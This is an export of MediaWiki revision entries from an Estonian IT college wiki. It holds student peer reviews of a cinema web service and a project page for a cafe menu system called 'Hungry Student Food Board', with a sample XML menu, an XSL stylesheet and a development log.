Tegelikult saab filmi küsimise meetodile öelda, kas ta annab ka alamobjektid (hind, zanr, inimesed jne) või mitte. &lt;br /&gt;
Eraldi ongi sellepärast, et saaks küsida ainult filmi kohta infot. Pannes üheks parameetriks &amp;quot;true&amp;quot;, siis pistetakse&lt;br /&gt;
hind filmi objekti külge. Samas on vaja hinda eraldi pärida näiteks kino hinnakirja genereerimiseks. Ning hindasid&lt;br /&gt;
peab saama eraldi ka kustutada, kuna hinnad ei ole ju jäigalt seotud filmiga vaid ikka kinoga.&lt;br /&gt;
&lt;br /&gt;
Aga täname arvamuse eest :)&lt;br /&gt;
&lt;br /&gt;
Kert Suvi D22&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Teenuse arvustus&lt;br /&gt;
&lt;br /&gt;
Teenuseid on korralik hulk, kuid Eestikeelsed API nimed ei ole arusaadavad välismaalastele. Segadust tekitab veel &amp;quot;anna*&amp;quot; ja &amp;quot;võta*&amp;quot;, kas mina annan talle ja ta võtab, või võtab tema ja annab mulle - nimi peaks ütleme kohe mis suunas liiklus käib. Tundub et mõned päringud saaks kokku &#039;&#039;mergeda&#039;&#039;, näiteks annaFilmid ja annaFilmidNimi. Üldiselt aga on kena :)&lt;br /&gt;
&lt;br /&gt;
-Tanel Liiv D22&lt;br /&gt;
&lt;br /&gt;
Teenuse arvustus&lt;br /&gt;
&lt;br /&gt;
Esimese asjana hakkas silma, et te olete iga päringu tüübi jaoks teinud eraldi teenuse. Minu arvates koodi loetavuse mõttes on see hea, aga teenust ennast oleks mugavam kasutada kui kõik meetodid oleks üheks teenuseks koondatud.&lt;br /&gt;
Üldiselt tundub, et teenusel on olemas kõikvõimalikud meetodid, mida vaja võiks minna. Positiivne on, et peaaegu kõigil meetoditel on olemas ka kirjeldus, et mida see teeb ning mis parameetreid vajab.&lt;br /&gt;
Projektiga võiksite .sln või vähemalt .csproj failid ka kaasa panna, et visual studios parem vaadata oleks ning käivitada saaks.&lt;br /&gt;
&lt;br /&gt;
Siim Aaver D21&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Vastus: &lt;br /&gt;
&lt;br /&gt;
Üks põhjus, miks jagasime tükkideks oligi loetavus. Teine põhjus on see, et kui keegi peaks avaldama soovi rakenduse tegemiseks meie teenusele, siis saame anda ligipääsu ainult &amp;quot;AnnaTeenus&amp;quot;-ele. Kui keegi teeb lihtsalt kinokava kuvamise rakenduse, siis pole tal vaja ei lisamise ega kustutamise teenust/meetodeid näha.&lt;br /&gt;
&lt;br /&gt;
Aga täname arvamuse eest :)&lt;br /&gt;
&lt;br /&gt;
Kert Suvi D22&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Teenuse arvustus&lt;br /&gt;
&lt;br /&gt;
Wiki lehel on teenuse all välja toodud kõik meetodid, aga pole ühelegile meetodile juurde kirjutatud mida too teeb, aga mis on hea - kui lähtekoodi uurida siis seal on iga meetodi juures ära kirjeldatud, mida too teeb ja mida ta tagastab. Lisaks häirib kasutatud &amp;quot;estenglish&amp;quot; kasutamine lähtekoodis, st meetodi nimed on eesti keelsed. Üldiselt kood on loetav ja ilusti struktureeritud.&lt;br /&gt;
&lt;br /&gt;
Toomas Soha D21&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Arvustus veebiteenuse klientidele==&lt;br /&gt;
&lt;br /&gt;
Kuna viibin hetkel arvuti taga kus ma ei saa visual studiot kasutada siis ei saa  nii täpset arvustust anda(nägin teie esitust klassis). Tahaks öelda mis häirib on see, et meetoid ja asjad on eestikeelsed. Rohkem oleksite võinud kommenteerida ka, kuigi esmapilgul tundus kõik suhteliselt arusaadav. Muidu on idee täitsa hea ja kindlasti seda täiendades saaks täiesti reaalselt kasutatava rakenduse ;) &lt;br /&gt;
&lt;br /&gt;
Madis Sildaru D32&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Veebiteenuse arvustus===&lt;br /&gt;
&lt;br /&gt;
Kino teema on väga huvitav ja hea teema. Proovisin ka ise midagi sellist ühe teise aine raames teha.&lt;br /&gt;
&lt;br /&gt;
Lisan siia, kuidas mulle meeldib koodi kirjutada (mitte mis valesti on):&lt;br /&gt;
&lt;br /&gt;
Vähegi suurema projekti puhul ei kasutaks linq&#039;t, kuna ta genereerib palju tarbetud koodi. Kui ma ei eksi, siis teil on hetkel nii linq kui oma loodud klassid. Andmebaasist kustutamise arvelt saaks palju kokku hoida, kuna tegelikult on ju parem kui jääb kõik ajalugu alles. Filmi / kino saab lihtsalt märkida suletuks. &lt;br /&gt;
Mida suurem projekt, seda rohkem tuleb klasse nagunii, seega ma ei teeks igale suvalisele väärtusele klassi, vaid realiseeriks täpselt niipalju meetodeid, kui parasjagu tarvis läheb. Samuti, kui vähegi võimalik, koondaks ühe teema funktsioonid ühte klassi (n: select, insert, delete jne).&lt;br /&gt;
&lt;br /&gt;
Kliendi pool oli lahedalt kujundatud ja ka repeaterite kasutamine oli hea mõte. &lt;br /&gt;
Ma kasutaks ka webUserControl elemente, siis ei peaks nii palju erinevaid lehti tegema ja saaks ka teinekord kasutada.&lt;br /&gt;
&lt;br /&gt;
PS! Seda, ma tulin teie projekti hindama lootuses, et saan mõne hea kommenteerimis vihje aga... &lt;br /&gt;
ei saa öelda, et ma just palju kommentaare oleks leidnud  :)&lt;br /&gt;
&lt;br /&gt;
Priit Siimo&lt;br /&gt;
&lt;br /&gt;
===Klientrakenduse arvustus===&lt;br /&gt;
Tanel Liiv&lt;br /&gt;
===Kokkuvõttev arvustus===&lt;br /&gt;
&lt;br /&gt;
Meeskond valis hea teema. Kino infosüsteemi on kindlasti midagi, mida saaks ka reaalselt kasutada, muidugi kui kõik väga korralikult teha ning rakendust piisavalt siluda. Samas oleks võinud selle teema kohta alguses wikis ka natuke juttu olla, et  millist lõpptulemust oodatakse, millise funktsionaalsusega ning mis rakendustega.&lt;br /&gt;
&lt;br /&gt;
XML tehti igati korralikult nagu ka teenusekiht, kus kõik teemade kaupa ilusasti ära oli jagatud. Rakenduse puhul meeldis mulle välimus, mis jäi kohe positiivse asjan silma. On küll sees väiksemaid buge, kuid põhifunktsionaalsus paistab töötavat.&lt;br /&gt;
&lt;br /&gt;
Meeskonna toimimise poole pealt on hea näha seda, et võeti kasutusele teises aines õpitud ekstreemprogrammeerimise praktika, et rakendust tõhusamalt ehitada. Lisaks tehti enamus asju ühiselt valmis, seega ilmselt kõik meeskonnaliikmeid panustasid korralikult lõpptulemusele.&lt;br /&gt;
&lt;br /&gt;
Kui jätta välja teine klientrakendus, siis tundub, et kõik nõuded said täidetud, muidugi wiki oleks võinud natuke põhjalikum olla. Aga vaadates üldist projektide taset, siis igati korralik tulemus !&lt;br /&gt;
&lt;br /&gt;
Rauno Rüga, D21&lt;br /&gt;
&lt;br /&gt;
[[User:Rruga|Rruga]]&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Meeskond_%22Hungry_Student_Food_Board%22&amp;diff=33749</id>
		<title>Meeskond &quot;Hungry Student Food Board&quot;</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Meeskond_%22Hungry_Student_Food_Board%22&amp;diff=33749"/>
		<updated>2011-06-05T20:46:44Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* Meeskond */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Repositooriumi aadress==&lt;br /&gt;
*http://svn3.xp-dev.com/svn/nomnom/HSFB/&lt;br /&gt;
*Versiooni haldus tarkvara - AnkhSVN või TurtoiseSVN&lt;br /&gt;
&lt;br /&gt;
==Ülesande püstitus==&lt;br /&gt;
&lt;br /&gt;
    * XML fail&lt;br /&gt;
          o XML fail, stiilifail ja skeemifail peavad olema valmis ja wikilehel kirjeldatud hiljemalt 27. veebruar 2011.&lt;br /&gt;
          o Arvamused XML-failide kohta peavad tehtud olema 4. märts 2011&lt;br /&gt;
&lt;br /&gt;
    * Veebiteenus&lt;br /&gt;
          o Veebiteenus peab olema valmis, esitatud ja ja wikilehel kirjeldatud hiljemalt 10. aprill 2011.&lt;br /&gt;
          o Arvamused veebiteenuste kohta peavad tehtud olema 17. aprill 2011&lt;br /&gt;
          o Veebiteenus tuleb esitleda!&lt;br /&gt;
&lt;br /&gt;
    * Klientrakendused&lt;br /&gt;
          o Klientrakendused peavad olema valmis, esitatud ja ja wikilehel kirjeldatud hiljemalt 10. aprill 2011.&lt;br /&gt;
          o Arvamused veebiteenuste kohta peavad tehtud olema 17. aprill 2011&lt;br /&gt;
          o Klientrakendused tuleb esitleda!&lt;br /&gt;
&lt;br /&gt;
    * Meeskonna kokkuvõttev aruanne&lt;br /&gt;
          o Meeskonnatöö kokkuvõttev aruanne peab olema valmis, esitatud ja ja wikilehel kirjeldatud hiljemalt 8.mai 2011&lt;br /&gt;
          o Arvamused Meeskonnatöö kokkuvõtva aruande ja esitluse kohta tuleb esitada hiljemalt päev enne eksamit&lt;br /&gt;
          o Meeskonna kokkuvõttev aruanne ja töö lõplik tulemus tuleb esitleda!&lt;br /&gt;
&lt;br /&gt;
==Meeskond==&lt;br /&gt;
*Jaan Kruusma  - projektijuht, analüüs&lt;br /&gt;
*Taavi Ilves - arendus, veebiteenus, facebook api&lt;br /&gt;
*Tanel Liiv - arendus, veebiteenus&lt;br /&gt;
*Indrek Kruuser - arendus, klientrakendus&lt;br /&gt;
*Hannes Karask - arendus, adminniliides, klientrakendus&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Punktid jagatakse võrdselt&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
==Idee==&lt;br /&gt;
Idee on luua kohviku menüü haldamise tarkvara. Kasutajal ehk kohvikul on võimalus interneti teel kirjeldada müüki minevad tooted ning tooteid kuvatakse kohvikutes LCD display pealt kui ka Facebooki kaudu kõikide kohvikute menüüsi jälgida. Me lähtume KISS põhimõttest ja hoiame info võimalikult konkreetsena, et kasutaja ei peaks pool päeva toite sisestama või pidevalt kogust arvestama.&lt;br /&gt;
&lt;br /&gt;
==Planeering==&lt;br /&gt;
* Veebiteenuse ehitame IronPythoniga .Net frameworki peale.&lt;br /&gt;
* Arenduskeskond on Visual Studio 2010, millel on IronPython liides.&lt;br /&gt;
* Andmebaasina kasutame MySQL&#039;i, see on kiire ja lihtne üles seada.&lt;br /&gt;
* Kliendipoolse lahenduse teeme Asp.Net&#039;i aines kõrval projektina.&lt;br /&gt;
* Kõik mis kuvatakse kasutajale ehk kohviku kylastajale teeme HTMLi ja JavaScriptiga&lt;br /&gt;
* Andmemudeli diagrammi koostame programmiga QSEE Superlite.&lt;br /&gt;
&lt;br /&gt;
==Veebiteenus==&lt;br /&gt;
*IronPythoni kasutus osutus vaevaliseks, asendasime selle C sharpiga.&lt;br /&gt;
**MVC3 raamistik&lt;br /&gt;
**Razor view engine mugavamaks kirjutamiseks&lt;br /&gt;
**MSSQL 2008 R2 andmebaasi mootoriks&lt;br /&gt;
**Andmete vahekiht LINQ To Entities&lt;br /&gt;
&lt;br /&gt;
*Tagastab kohviku menüü veebiteenuse ID järgi &lt;br /&gt;
*Klienditeenus genereerib igale kohvikule ID&lt;br /&gt;
*auth meetod &lt;br /&gt;
**tuvastatkse kasutaja&lt;br /&gt;
**päring kohviku andmetele&lt;br /&gt;
&lt;br /&gt;
*api meetod &lt;br /&gt;
**auth vastusest kuvab kohviku menüü&lt;br /&gt;
**Päeva menüü xml kujul &lt;br /&gt;
&lt;br /&gt;
*Statistika korjamine &lt;br /&gt;
**Kohviku, meetodi ning IP põhine&lt;br /&gt;
***Võimaldab näha statistikat kasutaja ja kohviku lõikes&lt;br /&gt;
***Võimaldab näha koormust meetodi põhiselt&lt;br /&gt;
**Minimaalne täpsus üks tund&lt;br /&gt;
***Et andmemahud ei kasvaks üle pea&lt;br /&gt;
***Et oleks võimalik koormust hinnata kellaajaliselt&lt;br /&gt;
*[[File:HSFBstats.png]]&lt;br /&gt;
&lt;br /&gt;
===Toodete kuvamine===&lt;br /&gt;
[[File:HSFBVeebiteenus.png]]&lt;br /&gt;
&lt;br /&gt;
==Andmediagramm==&lt;br /&gt;
&lt;br /&gt;
[[File:HSFB.png]]&lt;br /&gt;
&lt;br /&gt;
==Desktop Rakendus==&lt;br /&gt;
*Töölauakliendi jooksutamiseks on vaja Python 2.7.1 ning PyQt4 4.8.4&lt;br /&gt;
[[File:HFt66.png]]&lt;br /&gt;
&lt;br /&gt;
==Facebook Api==&lt;br /&gt;
*Toitude hääletamine reaalajas&lt;br /&gt;
[[File:HSFBapi.jpg]]&lt;br /&gt;
&lt;br /&gt;
== XML Fail ==&lt;br /&gt;
Highlighted: http://sprunge.us/DPIe?xml&lt;br /&gt;
&lt;br /&gt;
    &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot; ?&amp;gt;&lt;br /&gt;
    &amp;lt;?xml-stylesheet type=&amp;quot;text/xsl&amp;quot; href=&amp;quot;default.xsl&amp;quot;?&amp;gt;&lt;br /&gt;
    &amp;lt;kohvikud xmlns:xsi=&amp;quot;http://www.w3.org/2001/XMLSchema-instance&amp;quot;&lt;br /&gt;
    xsi:noNamespaceSchemaLocation=&amp;quot;kohvikud.xsd&amp;quot;&amp;gt;&lt;br /&gt;
            &amp;lt;kohvik name=&amp;quot;IT KOHVIK&amp;quot; staatus=&amp;quot;Nummisi pannkooke saadaval&amp;quot;&amp;gt;&lt;br /&gt;
                    &amp;lt;toit tyyp=&amp;quot;praad&amp;quot;&amp;gt;&lt;br /&gt;
                            &amp;lt;pilt&amp;gt;&lt;br /&gt;
                                    &amp;lt;url width=&amp;quot;100&amp;quot; height=&amp;quot;100&amp;quot;&amp;gt;http://www.neti.ee/pilt.jpg&amp;lt;/url&amp;gt;&lt;br /&gt;
                            &amp;lt;/pilt&amp;gt;&lt;br /&gt;
                            &amp;lt;pealkiri&amp;gt;kanapraad&amp;lt;/pealkiri&amp;gt;&lt;br /&gt;
                            &amp;lt;kirjeldus&amp;gt;sinihallitus sokiga&amp;lt;/kirjeldus&amp;gt;&lt;br /&gt;
                            &amp;lt;poolhind valuuta=&amp;quot;eur&amp;quot; rate=&amp;quot;1.0000&amp;quot;&amp;gt;100&amp;lt;/poolhind&amp;gt;&lt;br /&gt;
                            &amp;lt;tervehind valuuta=&amp;quot;eur&amp;quot; rate=&amp;quot;1.0000&amp;quot;&amp;gt;200&amp;lt;/tervehind&amp;gt;&lt;br /&gt;
                            &amp;lt;allahindlus&amp;gt;50%&amp;lt;/allahindlus&amp;gt;&lt;br /&gt;
                            &amp;lt;kehtib&amp;gt;31.03.2011&amp;lt;/kehtib&amp;gt;&lt;br /&gt;
                            &amp;lt;liked&amp;gt;34&amp;lt;/liked&amp;gt;&lt;br /&gt;
                    &amp;lt;/toit&amp;gt;&lt;br /&gt;
                    &amp;lt;toit tyyp=&amp;quot;supp&amp;quot;&amp;gt;&lt;br /&gt;
                            &amp;lt;pilt&amp;gt;&lt;br /&gt;
                                    &amp;lt;url width=&amp;quot;100&amp;quot; height=&amp;quot;100&amp;quot;&amp;gt;http://www.neti.ee/pilt2.jpg&amp;lt;/url&amp;gt;&lt;br /&gt;
                            &amp;lt;/pilt&amp;gt;&lt;br /&gt;
                            &amp;lt;pealkiri&amp;gt;õunasupp&amp;lt;/pealkiri&amp;gt;&lt;br /&gt;
                            &amp;lt;kirjeldus&amp;gt;koorega&amp;lt;/kirjeldus&amp;gt;&lt;br /&gt;
                            &amp;lt;poolhind valuuta=&amp;quot;eur&amp;quot; rate=&amp;quot;1.0000&amp;quot;&amp;gt;50&amp;lt;/poolhind&amp;gt;&lt;br /&gt;
                            &amp;lt;tervehind valuuta=&amp;quot;eur&amp;quot; rate=&amp;quot;1.0000&amp;quot;&amp;gt;120&amp;lt;/tervehind&amp;gt;&lt;br /&gt;
                            &amp;lt;allahindlus&amp;gt;10%&amp;lt;/allahindlus&amp;gt;&lt;br /&gt;
                            &amp;lt;kehtib&amp;gt;31.03.2011&amp;lt;/kehtib&amp;gt;&lt;br /&gt;
                            &amp;lt;liked&amp;gt;33&amp;lt;/liked&amp;gt;&lt;br /&gt;
                    &amp;lt;/toit&amp;gt;&lt;br /&gt;
            &amp;lt;/kohvik&amp;gt;&lt;br /&gt;
            &amp;lt;kohvik name=&amp;quot;TTY KOHVIK&amp;quot; staatus=&amp;quot;Parim koht&amp;quot;&amp;gt;&lt;br /&gt;
                    &amp;lt;toit tyyp=&amp;quot;praad&amp;quot;&amp;gt;&lt;br /&gt;
                            &amp;lt;pilt&amp;gt;&lt;br /&gt;
                                    &amp;lt;url width=&amp;quot;100&amp;quot; height=&amp;quot;100&amp;quot;&amp;gt;http://www.neti.ee/pilt2.jpg&amp;lt;/url&amp;gt;&lt;br /&gt;
                            &amp;lt;/pilt&amp;gt;&lt;br /&gt;
                            &amp;lt;pealkiri&amp;gt;seapraad&amp;lt;/pealkiri&amp;gt;&lt;br /&gt;
                            &amp;lt;kirjeldus&amp;gt;seentega&amp;lt;/kirjeldus&amp;gt;&lt;br /&gt;
                            &amp;lt;poolhind valuuta=&amp;quot;eur&amp;quot; rate=&amp;quot;1.0000&amp;quot;&amp;gt;200&amp;lt;/poolhind&amp;gt;&lt;br /&gt;
                            &amp;lt;tervehind valuuta=&amp;quot;eur&amp;quot; rate=&amp;quot;1.0000&amp;quot;&amp;gt;420&amp;lt;/tervehind&amp;gt;&lt;br /&gt;
                            &amp;lt;allahindlus&amp;gt;10%&amp;lt;/allahindlus&amp;gt;&lt;br /&gt;
                            &amp;lt;kehtib&amp;gt;31.03.2011&amp;lt;/kehtib&amp;gt;&lt;br /&gt;
                            &amp;lt;liked&amp;gt;2&amp;lt;/liked&amp;gt;&lt;br /&gt;
                    &amp;lt;/toit&amp;gt;&lt;br /&gt;
            &amp;lt;/kohvik&amp;gt;&lt;br /&gt;
    &amp;lt;/kohvikud&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== XSL ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;xsl:stylesheet version=&amp;quot;1.0&amp;quot;&lt;br /&gt;
xmlns:xsl=&amp;quot;http://www.w3.org/1999/XSL/Transform&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;xsl:template match=&amp;quot;/&amp;quot;&amp;gt;&lt;br /&gt;
	&amp;lt;html&amp;gt;&lt;br /&gt;
	&amp;lt;body&amp;gt;&lt;br /&gt;
	&amp;lt;h2&amp;gt;Kohvikud&amp;lt;/h2&amp;gt;&lt;br /&gt;
	&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
		&amp;lt;tr bgcolor=&amp;quot;#9acd32&amp;quot;&amp;gt;&lt;br /&gt;
			&amp;lt;th&amp;gt;Nimi&amp;lt;/th&amp;gt;&lt;br /&gt;
			&amp;lt;th&amp;gt;Staatus&amp;lt;/th&amp;gt;&lt;br /&gt;
		&amp;lt;th&amp;gt;Menüü&amp;lt;/th&amp;gt;&lt;br /&gt;
		&amp;lt;/tr&amp;gt;&lt;br /&gt;
		&amp;lt;xsl:for-each select=&amp;quot;kohvikud/kohvik&amp;quot;&amp;gt;&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
			&amp;lt;td valign=&amp;quot;top&amp;quot;&amp;gt;&amp;lt;xsl:value-of select=&amp;quot;@name&amp;quot;/&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
			&amp;lt;td valign=&amp;quot;top&amp;quot;&amp;gt;&amp;lt;xsl:value-of select=&amp;quot;@staatus&amp;quot;/&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
		&amp;lt;td valign=&amp;quot;top&amp;quot;&amp;gt;&lt;br /&gt;
			&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
			 &amp;lt;tr bgcolor=&amp;quot;#2acd32&amp;quot;&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;Pealkiri&amp;lt;/td&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;Väike portsjon&amp;lt;/td&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;Täis portsjon&amp;lt;/td&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;Soodustus&amp;lt;/td&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;Kehtib&amp;lt;/td&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;Kirjeldus&amp;lt;/td&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;Laike&amp;lt;/td&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;Pildid&amp;lt;/td&amp;gt;&lt;br /&gt;
			 &amp;lt;/tr&amp;gt;&lt;br /&gt;
		&amp;lt;xsl:for-each select=&amp;quot;./toit&amp;quot;&amp;gt;&lt;br /&gt;
			&amp;lt;tr&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;&amp;lt;xsl:value-of select=&amp;quot;pealkiri&amp;quot;/&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;&amp;lt;xsl:value-of select=&amp;quot;poolhind&amp;quot;/&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;&amp;lt;xsl:value-of select=&amp;quot;tervehind&amp;quot;/&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;&amp;lt;xsl:value-of select=&amp;quot;allahindlus&amp;quot;/&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;&amp;lt;xsl:value-of select=&amp;quot;kehtib&amp;quot;/&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;&amp;lt;xsl:value-of select=&amp;quot;kirjeldus&amp;quot;/&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;&amp;lt;xsl:value-of select=&amp;quot;liked&amp;quot;/&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
				&amp;lt;td&amp;gt;&lt;br /&gt;
					&amp;lt;xsl:for-each select=&amp;quot;./pilt&amp;quot;&amp;gt;&lt;br /&gt;
						&amp;lt;xsl:value-of select=&amp;quot;url&amp;quot;/&amp;gt;&lt;br /&gt;
					&amp;lt;/xsl:for-each&amp;gt;&lt;br /&gt;
				&amp;lt;/td&amp;gt;&lt;br /&gt;
			&amp;lt;/tr&amp;gt;&lt;br /&gt;
		&amp;lt;/xsl:for-each&amp;gt;&lt;br /&gt;
		&amp;lt;/table&amp;gt;&lt;br /&gt;
		&amp;lt;/td&amp;gt;&lt;br /&gt;
		&amp;lt;/tr&amp;gt;&lt;br /&gt;
		&amp;lt;/xsl:for-each&amp;gt;&lt;br /&gt;
	&amp;lt;/table&amp;gt;&lt;br /&gt;
	&amp;lt;/body&amp;gt;&lt;br /&gt;
	&amp;lt;/html&amp;gt;&lt;br /&gt;
&amp;lt;/xsl:template&amp;gt;&lt;br /&gt;
&amp;lt;/xsl:stylesheet&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== ASP.Net aine raames adminni sisuhaldus ==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Nagu eelpool mainitud, kasutame MVC3 raamistikku, andmeid liigutab LINQ to entities.&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kasutajal tuleb autentida, selleks on aspi enda membership lahendus.&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:HFSB_login.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Menüüde halduse esileht&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:HFSB_front.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kohvikute vaade, üldadmin näeb kõiki kohvikuid, tavaadmin ainult temaga seostatud kohvikuid&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:HFSB_cafes_front.png]]&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Igal kohvikul on enda tooted..&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
[[File:HFSB_tooted_front.png]]&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;..mille sisestamine näeb välja selline:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
[[File:HFSB_edit_product.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Tooteid saab luua, kustutada ja välja lülitada (viimane toimub ajaxiga).&lt;br /&gt;
&lt;br /&gt;
Tootel on küljes kehtivus kuupäev, vastavalt millele genereeritakse menüü. Menüüs on iga päeva peal toode, mis sel päeval kehtib.&lt;br /&gt;
&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
[[File:HFSB_menufilter.png]]&lt;br /&gt;
&lt;br /&gt;
== Logi ==&lt;br /&gt;
=== 16. Mai ===&lt;br /&gt;
Finaalesitlus&lt;br /&gt;
&lt;br /&gt;
=== 13. Mai ===&lt;br /&gt;
Ebaõnne päev ja lõpusirge arendus!&lt;br /&gt;
&lt;br /&gt;
===  6. Mai === &lt;br /&gt;
Desktopvaate analüüs &lt;br /&gt;
töölauakliendi jooksutamiseks on vaja Python 2.7.1 ning PyQt4 4.8.4&lt;br /&gt;
&lt;br /&gt;
=== 29. Aprill ===&lt;br /&gt;
Veebiteenuse parendamine&lt;br /&gt;
&lt;br /&gt;
=== 22. Aprill ===&lt;br /&gt;
Konkurendiga koostöö lepingu sõlmimine, koodivahetus.&lt;br /&gt;
&lt;br /&gt;
=== 18. Aprill ===&lt;br /&gt;
Teenuse presentatsioon, karm tagasiside ehk esimese testimis tulemuste analüüs ja iteratiivse arenguga jätkamine&lt;br /&gt;
&lt;br /&gt;
=== 15-17. Aprill ===&lt;br /&gt;
Veebiteenuse lõpu sprint&lt;br /&gt;
Andmebaasi lisatud tabel, mis korjab statistikat&lt;br /&gt;
&lt;br /&gt;
===  8. Aprill ===&lt;br /&gt;
Arendus Sprint &lt;br /&gt;
*määramatusest tulenevad probleemid&lt;br /&gt;
*vaate toorik&lt;br /&gt;
*versiooni halduse&lt;br /&gt;
&lt;br /&gt;
===  4. Aprill ===&lt;br /&gt;
Alamprojekt baasitäitmiseks&lt;br /&gt;
&lt;br /&gt;
=== 18. Märts ===&lt;br /&gt;
Andmebaasi lihvimine, teenuse toorik.&lt;br /&gt;
Projektijuht 2 nädalat komandeeringus, arenduse koordinaator sinisel lehel.&lt;br /&gt;
&lt;br /&gt;
=== 15. Märts ===&lt;br /&gt;
Töötav andmebaas, metsikud vaevad versioonihaldusega.&lt;br /&gt;
===  7. Märts ===&lt;br /&gt;
Rühmatöö ettevalmistused ja ümberkorraldused: MVC3 (Razor view engine) ja MSSQL SERVER 2008 R2 asendamine. Versioonihalduseks Mercurial HG. &lt;br /&gt;
===  1. Märts ===&lt;br /&gt;
Andmediagrammi esialgsed kavandid, et sobiks xmliga kokku.&lt;br /&gt;
&lt;br /&gt;
=== 23. Veebruar ===&lt;br /&gt;
Tekkisid määramatusest tulenevad probleemid, haigestumine ja riigipühad.&lt;br /&gt;
Xml ja Xsl valmis, Schema vajab täiendusi.&lt;br /&gt;
&lt;br /&gt;
=== 17. Veebruar ===&lt;br /&gt;
Projekti kavand pandi paika ja jaotati esialgsed töö ülesanded.&lt;br /&gt;
Esialgse Xml&#039;i draft, endiselt arenduses.&lt;br /&gt;
&lt;br /&gt;
=== 16. Veebruar ===&lt;br /&gt;
Drastilised muudatused arendus tööriistade valikul. Põhi osa programmist luuakse Pythoniga .NET raamistikus, aga kliendi liides tehakse ikkagi asp.net&#039;iga.&lt;br /&gt;
&lt;br /&gt;
=== 14. Veebruar ===&lt;br /&gt;
Meeskonna nime valik ja wiki lehe alustamine.&lt;br /&gt;
&lt;br /&gt;
=== 7. Veebruar ===&lt;br /&gt;
Arendus vahenditega tutvumine, kuidas teha, mida teha. Palju metadata kogumist.&lt;br /&gt;
&lt;br /&gt;
=== 2. Veebruar ===&lt;br /&gt;
Uue meeskonna moodustamine ja idee kujunemine&lt;br /&gt;
&lt;br /&gt;
[[Category: Võrgurakendused II: hajussüsteemide ehitamine]]&lt;br /&gt;
[[Category: Veebirakenduste loomine ASP.NET abil]]&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Meeskond_%22Hungry_Student_Food_Board%22&amp;diff=33748</id>
		<title>Meeskond &quot;Hungry Student Food Board&quot;</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Meeskond_%22Hungry_Student_Food_Board%22&amp;diff=33748"/>
		<updated>2011-06-05T20:46:32Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Repositooriumi aadress==&lt;br /&gt;
*http://svn3.xp-dev.com/svn/nomnom/HSFB/&lt;br /&gt;
*Versiooni haldus tarkvara - AnkhSVN või TurtoiseSVN&lt;br /&gt;
&lt;br /&gt;
==Ülesande püstitus==&lt;br /&gt;
&lt;br /&gt;
    * XML fail&lt;br /&gt;
